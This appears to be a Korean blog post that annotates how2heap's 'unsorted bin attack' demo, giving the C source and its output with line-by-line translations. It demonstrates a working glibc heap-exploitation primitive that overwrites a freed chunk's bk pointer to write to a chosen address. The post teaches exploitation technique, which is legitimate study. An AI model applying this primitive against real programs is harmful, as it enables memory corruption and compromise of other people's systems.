#include "stdio.h"
#include "stdlib.h"
int main(){
printf("This file demonstrates unsorted bin attack by write a large unsigned long value into stack\n");
printf("In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the "
"global variable global_max_fast in libc for further fastbin attack\n\n");
unsigned long stack_var=0;
printf("Let's first look at the target we want to rewrite on stack:\n");
printf("%p: %ld\n\n", &stack_var, stack_var);
unsigned long *p=malloc(400);
printf("Now, we allocate first normal chunk on the heap at: %p\n",p);
printf("And allocate another normal chunk in order to avoid consolidating the top chunk with"
"the first one during the free()\n\n");
malloc(500);
free(p);
printf("We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer "
"point to %p\n",(void*)p[1]);
//------------VULNERABILITY-----------
p[1]=(unsigned long)(&stack_var-2);
printf("Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
printf("And we write it with the target address-16 (in 32-bits machine, it should be target address-8):%p\n\n",(void*)p[1]);
//------------------------------------
malloc(400);
printf("Let's malloc again to get the chunk we just free. During this time, target should has already been "
"rewrite:\n");
printf("%p: %p\n", &stack_var, (void*)stack_var);
}
This file demonstrates unsorted bin attack by write a large unsigned long value into stack
이 파일은 unsorted bin attack을 unsigned long vulue를 stack에 씀으로써 설명한다.
In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the global variable global_max_fast in libc for further fastbin attack
연습으로, unsorted bin attack은 일반적으로 추가공격을 위해 준비된다. libc안의 전역변수 global_max_fast을 다시써서 fastbin attack으로 사용하는 공격말이다.
unsigned long stack_var=0;
Let's first look at the target we want to rewrite on stack:
0x7ffdd1787990(stack_var의 주소): 0
먼저 우리가 스택위에 다시 쓰고자하는 target을 보자
unsigned long *p=malloc(400);
Now, we allocate first normal chunk on the heap at: 0x85f420
이제 우리는 첫번째 normal chunk를 0x85f420의 heap영역에 할당했따.
And allocate another normal chunk in order to avoid consolidating the top chunk with the first one during the free()
그리고 다른 normal chunk를 할당한다. free중에 첫번째 chunk와 통합한 top chunk를 피하기 위해
malloc(500); free(p);
We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer point to 0x7fb468becb58(*p[1])
우리는 이제 첫번째 chunk를 free한다. 그리고 이것은 unsorted bin으로 삽입될 것이다. 이것의 bk 포인터와 함께
p[1]=(unsigned long)(&stack_var-2);
Now emulating a vulnerability that can overwrite the victim->bk pointer
이제 victim의 bk pointer를 덮어쓰는 취약점을 애뮬레이팅하자
And we write it with the target address-16 (in 32-bits machine, it should be target address-8):0x7ffdd1787980
그리고 우리는 이것을 targetaddress - 16의 값으로 쓴다(32bit 머신에서 이것은 targetaddress-8이 되야함)
malloc(400);
Let's malloc again to get the chunk we just free. During this time, target should has already been rewrite:
0x7ffdd1787990(&stack_var): 0x7fb468becb58
다시 우리가 방금 free햇던 chunk를 가져오기 위해 malloc을 하자
이번 동안에, target은 이미 rewrite되어있다.
'시스템 > how2heap시리즈' 카테고리의 다른 글
| [how2heap 정리]fast_bin_dup_into_stack (0) | 2017.01.07 |
|---|---|
| [how2heap 정리]fastbin_dup (0) | 2017.01.06 |
| [how2heap]unsafe_unlink (0) | 2016.12.16 |
| [how2heap정리]house of spirit (0) | 2016.12.16 |
| [how2heap정리]house of force (0) | 2016.12.15 |